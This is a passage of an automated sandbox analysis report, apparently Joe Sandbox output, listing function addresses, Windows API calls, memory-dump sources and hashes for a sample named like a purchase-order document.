                                • Opcode ID: 2f8b96bb3a6310d1efe4cb2e5441f15f19306e0600d5b100c3cb6c1b5dd0b5a7
                                • Instruction ID: 47fcbbaa182a48eac7e539164a4c5f0a60f023f616c78ad5da5e7a6c0caacac8
                                • Opcode Fuzzy Hash: 2f8b96bb3a6310d1efe4cb2e5441f15f19306e0600d5b100c3cb6c1b5dd0b5a7
                                • Instruction Fuzzy Hash: 19319031008340DFD314EF54D881AAFBBF8EFA9344F54092DF9918A1A1EB719989CB92
                                Function 001E8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • GetCursorPos.USER32(?), ref: 001E9001
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001A7711,?,?,?,?,?), ref: 001E9016
                                • GetCursorPos.USER32(?), ref: 001E905E
                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001A7711,?,?,?), ref: 001E9094
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                • String ID:
                                • API String ID: 2864067406-0
                                • Opcode ID: e535c185c1f15933aca1b70ebabde5f8722bf9a449ea88d2e62c704b2825381c
                                • Instruction ID: 07a48393b80b178ff8dc94814b513866549663635535062e04964ad28ab26fb0
                                • Opcode Fuzzy Hash: e535c185c1f15933aca1b70ebabde5f8722bf9a449ea88d2e62c704b2825381c
                                • Instruction Fuzzy Hash: C221D172600558FFCB258F95CC98EFE7BB9EF89350F444055F9058B261C3319AA1DBA0
                                Function 001BD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNEL32(?,001ECB68), ref: 001BD2FB
                                • GetLastError.KERNEL32 ref: 001BD30A
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 001BD319
                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001ECB68), ref: 001BD376
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateDirectory$AttributesErrorFileLast
                                • String ID:
                                • API String ID: 2267087916-0
                                • Opcode ID: 4c441b3c6af76c3074bbbad3764ad812c3a8915df5723480c79fb1e8f9c9d735
                                • Instruction ID: 63dc299bb64272bf914e0637f6592426d026b28c3aae46a2320fdac3ec6dcbea
                                • Opcode Fuzzy Hash: 4c441b3c6af76c3074bbbad3764ad812c3a8915df5723480c79fb1e8f9c9d735
                                • Instruction Fuzzy Hash: 9D2171B0505301DF8718DF68D8814AE77E4BF55764F104A1DF8A9CB2A2E731D94ACB93
                                Function 001B1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001B102A
                                  • Part of subcall function 001B1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001B1036
                                  • Part of subcall function 001B1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1045
                                  • Part of subcall function 001B1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001B104C
                                  • Part of subcall function 001B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1062
                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001B15BE
                                • _memcmp.LIBVCRUNTIME ref: 001B15E1
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B1617
                                • HeapFree.KERNEL32(00000000), ref: 001B161E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                • String ID:
                                • API String ID: 1592001646-0
                                • Opcode ID: ac69ad9dd6e82f02be1710118516b122188af3c4a00bab0af07b2e88e27ccdeb
                                • Instruction ID: 43b7fdb36078d8ec6117ca69dadcea068772ad06f5cd4ad79c6a2b8bf60ef420
                                • Opcode Fuzzy Hash: ac69ad9dd6e82f02be1710118516b122188af3c4a00bab0af07b2e88e27ccdeb
                                • Instruction Fuzzy Hash: 1E21AC32E00208FFDF10DFA5C965BEEB7B8EF45354F4A8459E441AB241E770AA45CBA0
                                Function 001E2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 001E280A
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001E2824
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001E2832
                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001E2840
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Long$AttributesLayered
                                • String ID:
                                • API String ID: 2169480361-0
                                • Opcode ID: 925569be6043f9d6feb2175d21ae382dc31a89cae82aed4f684f0df756de9f71
                                • Instruction ID: 5418bf91bd2b4b1b0f5f122f834d851e36490f72e5258ff4e49beafd6c6d075e
                                • Opcode Fuzzy Hash: 925569be6043f9d6feb2175d21ae382dc31a89cae82aed4f684f0df756de9f71
                                • Instruction Fuzzy Hash: 1121F431604990AFD7149B25CC95FAE7799AF95324F148158F8268F6D2C771FC82C7D0
                                Function 001B78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001B790A,?,000000FF,?,001B8754,00000000,?,0000001C,?,?), ref: 001B8D8C
                                  • Part of subcall function 001B8D7D: lstrcpyW.KERNEL32(00000000,?,?,001B790A,?,000000FF,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B8DB2
                                  • Part of subcall function 001B8D7D: lstrcmpiW.KERNEL32(00000000,?,001B790A,?,000000FF,?,001B8754,00000000,?,0000001C,?,?), ref: 001B8DE3
                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B7923
                                • lstrcpyW.KERNEL32(00000000,?,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B7949
                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B7984
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: lstrcmpilstrcpylstrlen
                                • String ID: cdecl
                                • API String ID: 4031866154-3896280584
                                • Opcode ID: 62898e2989056329b1dd83b657688bb42bb695ffa3c83f07d2daba4b323e84ef
                                • Instruction ID: 446d6b0ead6fe286b82933afe4687ab0f7115d3e0fded0719ee9be3b60822383
                                • Opcode Fuzzy Hash: 62898e2989056329b1dd83b657688bb42bb695ffa3c83f07d2daba4b323e84ef
                                • Instruction Fuzzy Hash: 1D11263A200342ABCB15AF74DC44DBA77A9FF95764B00402AF802CB2A4EB31D812C7A1
                                Function 001E5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 001E56BB
                                • _wcslen.LIBCMT ref: 001E56CD
                                • _wcslen.LIBCMT ref: 001E56D8
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001E5816
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend_wcslen
                                • String ID:
                                • API String ID: 455545452-0
                                • Opcode ID: 40bf852205a2e3ed2b573aec4d818db821c837c8d2ef5a682801f3d5bfe88e61
                                • Instruction ID: 67c7610adf6a37e576d34c0914502f3ebba8f9f4fd3809ff34131aaf7ff82c02
                                • Opcode Fuzzy Hash: 40bf852205a2e3ed2b573aec4d818db821c837c8d2ef5a682801f3d5bfe88e61
                                • Instruction Fuzzy Hash: 1111D375A00A99A6DF209FA2CCC5AEE77BCEF15768F148026F915D6081E770CA80CB60
                                Function 001B1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 001B1A47
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001B1A59
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001B1A6F
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001B1A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 085ab49516526fe55bbdb1cd7b8be5f960e25dc62bcd9746105befc6a88761b8
                                • Instruction ID: a40292b94913eb253cdb6edad3f77eaaf9eccec4fbceb0a93fb475b6c635bbc8
                                • Opcode Fuzzy Hash: 085ab49516526fe55bbdb1cd7b8be5f960e25dc62bcd9746105befc6a88761b8
                                • Instruction Fuzzy Hash: 5011273A901219FFEB109BA4CD85FEDBB79EB08750F210091EA00B7290D7716E50DB94
                                Function 001BE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 001BE1FD
                                • MessageBoxW.USER32(?,?,?,?), ref: 001BE230
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001BE246
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001BE24D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                • String ID:
                                • API String ID: 2880819207-0
                                • Opcode ID: eaabe47dd14afea5e5b6b30c73dfd3e87c169bd923cad747b24d822996b34f39
                                • Instruction ID: abe6a3688d147d811b50f25573720d6fc33585df944201ba5b598f0da026f622
                                • Opcode Fuzzy Hash: eaabe47dd14afea5e5b6b30c73dfd3e87c169bd923cad747b24d822996b34f39
                                • Instruction Fuzzy Hash: E411E176904258BBC721DBE8AC49ADE7BEDAB45320F104299F825E3291D7B099018BA0
                                Function 0017D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,?,0017CFF9,00000000,00000004,00000000), ref: 0017D218
                                • GetLastError.KERNEL32 ref: 0017D224
                                • __dosmaperr.LIBCMT ref: 0017D22B
                                • ResumeThread.KERNEL32(00000000), ref: 0017D249
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                • String ID:
                                • API String ID: 173952441-0
                                • Opcode ID: 5311b664bebd7f6934e739e5906f2a7be05184c1ebcc9170ca65c972c1a7ca5a
                                • Instruction ID: fc3e66a432cae2e91e78886cfc5a2491d5d5ed5b3eac17a5a9f6fa94db7edfa8
                                • Opcode Fuzzy Hash: 5311b664bebd7f6934e739e5906f2a7be05184c1ebcc9170ca65c972c1a7ca5a
                                • Instruction Fuzzy Hash: DD01D236805208BBCB116BA5EC09BAF7A79EF91731F208219F929961D1CF70C942C6E0
                                Function 0015600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0015604C
                                • GetStockObject.GDI32(00000011), ref: 00156060
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0015606A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateMessageObjectSendStockWindow
                                • String ID:
                                • API String ID: 3970641297-0
                                • Opcode ID: 1cb52e8c67ebc31763f474ecf7ef256dc508458a9acce96b84c2275b1ab25be6
                                • Instruction ID: ca1273e21113052dea6ccfbe7369bdc883fc8abeabe74e4c71ce7eeee7016993
                                • Opcode Fuzzy Hash: 1cb52e8c67ebc31763f474ecf7ef256dc508458a9acce96b84c2275b1ab25be6
                                • Instruction Fuzzy Hash: 23118B72501648FFEF164FA4DC84EEABB69EF183A5F440201FE245A150C7369CA19BE0
                                Function 00173B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00173B56
                                  • Part of subcall function 00173AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00173AD2
                                  • Part of subcall function 00173AA3: ___AdjustPointer.LIBCMT ref: 00173AED
                                • _UnwindNestedFrames.LIBCMT ref: 00173B6B
                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00173B7C
                                • CallCatchBlock.LIBVCRUNTIME ref: 00173BA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                • String ID:
                                • API String ID: 737400349-0
                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                • Instruction ID: 63fdb484111fcd34d67418c56c921a40c69e77d129e60978e7f4185fed160a71
                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                • Instruction Fuzzy Hash: 6901E932100149BBDF125E95CC46EEB7B79EF58754F048018FE6C96121C732E961EBA1
                                Function 00183073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001513C6,00000000,00000000,?,0018301A,001513C6,00000000,00000000,00000000,?,0018328B,00000006,FlsSetValue), ref: 001830A5
                                • GetLastError.KERNEL32(?,0018301A,001513C6,00000000,00000000,00000000,?,0018328B,00000006,FlsSetValue,001F2290,FlsSetValue,00000000,00000364,?,00182E46), ref: 001830B1
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0018301A,001513C6,00000000,00000000,00000000,?,0018328B,00000006,FlsSetValue,001F2290,FlsSetValue,00000000), ref: 001830BF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 4468cca49bc91ffa9d4a19c46fcc8eabdb0abbd636da834eb60b895b1fb29170
                                • Instruction ID: e03e78561e1531b4bf3e80a5f7e45164ccd89b6627098c43311297549a8ccc8e
                                • Opcode Fuzzy Hash: 4468cca49bc91ffa9d4a19c46fcc8eabdb0abbd636da834eb60b895b1fb29170
                                • Instruction Fuzzy Hash: AA01A732751322EBCB315BF9AC8896B7B98AF45F61B190720F925E7540D721DB42CBE0
                                Function 001B7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 001B747F
                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001B7497
                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001B74AC
                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001B74CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Type$Register$FileLoadModuleNameUser
                                • String ID:
                                • API String ID: 1352324309-0
                                • Opcode ID: 70be6c84edc64d056eb4cf2f5221a74543564703f454e3d7ed28dda09cd4a20a
                                • Instruction ID: 8a6267883d3a965de25dc564b9630db69c10a9853cea973606a28e5af70636d8
                                • Opcode Fuzzy Hash: 70be6c84edc64d056eb4cf2f5221a74543564703f454e3d7ed28dda09cd4a20a
                                • Instruction Fuzzy Hash: 5611A1B12093149BE7209F54DC48FD67BFCEB40B01F108969E616DA5D1D770E944DB90
                                Function 001BB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                Download Yara Rule
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB0C4
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB0E9
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB0F3
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CounterPerformanceQuerySleep
                                • String ID:
                                • API String ID: 2875609808-0
                                • Opcode ID: eba3e359d5183d3f03802919c0f87f922b98df4edd21ec01882598df3b64316f
                                • Instruction ID: d7d6ca2225c388a499725ca3b9db81e3dd8fdecdda71b296ed4896f4ad965c4d
                                • Opcode Fuzzy Hash: eba3e359d5183d3f03802919c0f87f922b98df4edd21ec01882598df3b64316f
                                • Instruction Fuzzy Hash: 4E113971C0552CE7CF04AFE8E9E86FEBB78FF0A711F114085E941B6681CBB096518B91
                                Function 001B2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001B2DC5
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 001B2DD6
                                • GetCurrentThreadId.KERNEL32 ref: 001B2DDD
                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001B2DE4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                • String ID:
                                • API String ID: 2710830443-0
                                • Opcode ID: 95c7b3b8bc58545193677c83e39086546a2ee8db14cb9dbf3674ceedbd74ee75
                                • Instruction ID: 78eb0e92972cfff952966d3d02f5f642e533261d353615e6875261b07e5b2489
                                • Opcode Fuzzy Hash: 95c7b3b8bc58545193677c83e39086546a2ee8db14cb9dbf3674ceedbd74ee75
                                • Instruction Fuzzy Hash: 9DE09272101224BBDB201BF29C4DFEF7E6CEF46BA1F000019F105D55809BA0C886C6F0
                                Function 001E8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00169693
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696A2
